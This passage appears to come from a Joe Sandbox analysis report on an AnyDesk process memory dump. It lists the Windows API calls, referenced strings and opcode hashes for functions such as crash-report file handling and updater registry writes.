                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$ModuleName
                                                                                                                                                                                                                                                  • String ID: debug.log
                                                                                                                                                                                                                                                  • API String ID: 253491666-600467936
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2501A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C25024
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C64392
                                                                                                                                                                                                                                                  • DeleteFile , xrefs: 69C643C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                  • String ID: DeleteFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 2018770650-2174402464
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C6674E: CloseHandle.KERNEL32(000000FF,?,00000000), ref: 69C66761
                                                                                                                                                                                                                                                    • Part of subcall function 69C6674E: GetLastError.KERNEL32(?,00000000), ref: 69C6677A
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 69C64612
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C64631
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C6463D
                                                                                                                                                                                                                                                  • DeleteFile , xrefs: 69C6466F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseDeleteFileHandle
                                                                                                                                                                                                                                                  • String ID: DeleteFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1758595503-2174402464
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __vwprintf_l.LIBCMT ref: 69C66A12
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 69C66A2F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66A3C
                                                                                                                                                                                                                                                  • CreateFile , xrefs: 69C66A6A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__vwprintf_l
                                                                                                                                                                                                                                                  • String ID: CreateFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3407089876-2132845161
                                                                                                                                                                                                                                                  • Opcode ID: 5a5a9b2e9fd42225ac42d342a37bb11b3e412aa06e07a9fb6e21afad6771789d
                                                                                                                                                                                                                                                  • Instruction ID: 538f46e2b2b55a85a81429dd15b482daab7cb2373d9e7687f78213a6a107049d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a5a9b2e9fd42225ac42d342a37bb11b3e412aa06e07a9fb6e21afad6771789d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511E739A50308AEEB14DFB4FC92FAE77A8EF04324F50911AF915AB1D1FB315E048664
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __vwprintf_l.LIBCMT ref: 69C66946
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000001C,0000001C,00000000), ref: 69C66963
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66970
                                                                                                                                                                                                                                                  • CreateFile , xrefs: 69C6699E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__vwprintf_l
                                                                                                                                                                                                                                                  • String ID: CreateFile $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3407089876-2132845161
                                                                                                                                                                                                                                                  • Opcode ID: 4208a639f5f521797050c3503436803534c7ae48285ab3c38fb45ce2d41c79e3
                                                                                                                                                                                                                                                  • Instruction ID: 2454c4a8bceff9a339ec367394382f100c91da199f3eaeff5ef91b83aef5c2bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4208a639f5f521797050c3503436803534c7ae48285ab3c38fb45ce2d41c79e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02110A75A103086FEB14DBB4FD92FAE73A8EF05324F50511AF9146B1D1FB315E048664
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • g.sec.auto_logon.clear_token.done=Alle tokens gewistad.cfg.sec.auto_logon.clear_token_tt=Ontneemt onmiddellijk het recht om een verbinding te maken van alle verbruikers die de toegangsgegevens van deze computer hebben opgeslagen.ad.cfg.sec.clear_prev_profi, xrefs: 69C328BC
                                                                                                                                                                                                                                                  • list<T> too long, xrefs: 69C328E8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: g.sec.auto_logon.clear_token.done=Alle tokens gewistad.cfg.sec.auto_logon.clear_token_tt=Ontneemt onmiddellijk het recht om een verbinding te maken van alle verbruikers die de toegangsgegevens van deze computer hebben opgeslagen.ad.cfg.sec.clear_prev_profi$list<T> too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-1106650552
                                                                                                                                                                                                                                                  • Opcode ID: 50a58e752218330cb23fbdf43fe452ed953a28ecd89f1439005cae73d1bfd278
                                                                                                                                                                                                                                                  • Instruction ID: 1f2ee8c7644ecd2ff6342e72f239f4ce3497112d5b0c4c344368fc547eb6f6d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50a58e752218330cb23fbdf43fe452ed953a28ecd89f1439005cae73d1bfd278
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8119E76A002299BCB10CF98E580989F7F5FF89710B55C6A9DD08AB304E731ED06CBD2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,?,?), ref: 69C63E55
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?), ref: 69C63E6E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C63E7B
                                                                                                                                                                                                                                                  • UnlockFileEx, xrefs: 69C63E8E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastUnlock
                                                                                                                                                                                                                                                  • String ID: UnlockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3655728120-672186346
                                                                                                                                                                                                                                                  • Opcode ID: bb38b5cbb400c70aa2fc00393ac5f20d125b92e135f67c0319f2f452aa9b071e
                                                                                                                                                                                                                                                  • Instruction ID: c418c01ff08cc7fd68fca5c1eae0a1132af484a848b8a2eaf2e5e2bcd72b28fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb38b5cbb400c70aa2fc00393ac5f20d125b92e135f67c0319f2f452aa9b071e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD11233A4007097EE724DEB4FC91BABB3B8EF41358F10486EE295A60E1FB3119058660
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LockFileEx.KERNEL32(00000000,00000000,00000000,000000FF,000000FF,?,0000001C,0000001C,00000000), ref: 69C667FA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66810
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C6681C
                                                                                                                                                                                                                                                  • LockFileEx, xrefs: 69C6682F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastLock
                                                                                                                                                                                                                                                  • String ID: LockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1811722133-1010764315
                                                                                                                                                                                                                                                  • Opcode ID: 532a908ab02b7f829b7045b73b04902672151b46b63790ea442a420c2aa2e713
                                                                                                                                                                                                                                                  • Instruction ID: 66dc220c673591c6a3ffd37b610cb4fc699e96146c572a322941f1abdbff68e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532a908ab02b7f829b7045b73b04902672151b46b63790ea442a420c2aa2e713
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A0149755046183AEB10DEB4EC91BEB776CEF09378F40016AE618A60D1EA32594686A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C66AEE
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66B07
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66B13
                                                                                                                                                                                                                                                  • SetFilePointerEx, xrefs: 69C66B26
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID: SetFilePointerEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 2976181284-399997206
                                                                                                                                                                                                                                                  • Opcode ID: c02b057b7287d9c1509e96c2b9d9077398f489d70767d37b2f1c3c6f9c6203c0
                                                                                                                                                                                                                                                  • Instruction ID: ca9a3db05fb6977b6c2fd31d72ae09ed0ad046a1657198b8b4fef19c7a7e9cdc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c02b057b7287d9c1509e96c2b9d9077398f489d70767d37b2f1c3c6f9c6203c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73112636600605ABEB14CE68FED2FAE7769FB40364F408169F616971D2FB319A019A50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CanOfferRelaunch.GCAPI(?,?,?,?), ref: 69C6052C
                                                                                                                                                                                                                                                    • Part of subcall function 69C33FC0: RegCreateKeyExW.ADVAPI32(00000202,?,00000000,00000000,00000000,?,00000000,?), ref: 69C33FFA
                                                                                                                                                                                                                                                    • Part of subcall function 69C33FC0: RegCloseKey.ADVAPI32 ref: 69C3400D
                                                                                                                                                                                                                                                    • Part of subcall function 69C343A0: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 69C343E1
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F147: GetLocalTime.KERNEL32(?), ref: 69C5F15F
                                                                                                                                                                                                                                                    • Part of subcall function 69C34370: RegSetValueExW.ADVAPI32(?,00000202,00000000,00000004,00000004), ref: 69C34390
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}, xrefs: 69C60542
                                                                                                                                                                                                                                                  • RelaunchAllowedAfter, xrefs: 69C60575
                                                                                                                                                                                                                                                  • RelaunchBrandcode, xrefs: 69C6055E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$CloseCreateLocalOfferRelaunchTime
                                                                                                                                                                                                                                                  • String ID: RelaunchAllowedAfter$RelaunchBrandcode$Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
                                                                                                                                                                                                                                                  • API String ID: 4093175577-67220017
                                                                                                                                                                                                                                                  • Opcode ID: 62e0562e9692aec76acc19c365556e2b2081f88f3c6053f55842ad4f35246786
                                                                                                                                                                                                                                                  • Instruction ID: d6c20c803799bf6d8eafdb0c813b341160da7da24d6d1763baef42476a1005dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62e0562e9692aec76acc19c365556e2b2081f88f3c6053f55842ad4f35246786
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9116D3590022A6BDB14EEA5FD41ADF7B38AF08354F808465AE11B60A1FB71A920DBD5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UnlockFileEx.KERNEL32(000000FF,00000000,000000FF,000000FF,?,00000000,00000000), ref: 69C66C5B
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66C72
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66C7F
                                                                                                                                                                                                                                                  • UnlockFileEx, xrefs: 69C66C92
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastUnlock
                                                                                                                                                                                                                                                  • String ID: UnlockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3655728120-168028389
                                                                                                                                                                                                                                                  • Opcode ID: dfbc3594481478d1ce3938b7970902673b1d595d46e31bc71c6e983b883860f9
                                                                                                                                                                                                                                                  • Instruction ID: 74e0969be31cb624634b55c0ce411f6a63e955894ee2d72ab48df1087653ce55
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfbc3594481478d1ce3938b7970902673b1d595d46e31bc71c6e983b883860f9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4017B35904B043AEB00CFB4FD92FAEB37CEB45364F500226E624B60E1FB321D064461
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                  • Opcode ID: 08bbd95e0c94314e88f8ac9cb1697bb445864f1c51da791db5baa43eeec002dc
                                                                                                                                                                                                                                                  • Instruction ID: da80031735801edf8f3708a9817cbba13b8c605573b6d007ab3c0578f42b900d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08bbd95e0c94314e88f8ac9cb1697bb445864f1c51da791db5baa43eeec002dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A18932A043869FE711CF18E8917AEBBE1FF51358F14826DD48ADB281E37489B1C758
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C34CA0: AcquireSRWLockExclusive.KERNEL32(00000000,00000001,0000000F), ref: 69C34CBC
                                                                                                                                                                                                                                                    • Part of subcall function 69C34CA0: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34D21
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34EDB
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F0A
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34FCD
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C3500A
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 69C35BFA
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C35C1E
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 69C35C47
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C35C6B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 17069307-0
                                                                                                                                                                                                                                                  • Opcode ID: 30698d9ed052925614070b01d3ad27930918cc672cca2bf69f2f7105bdf2c445
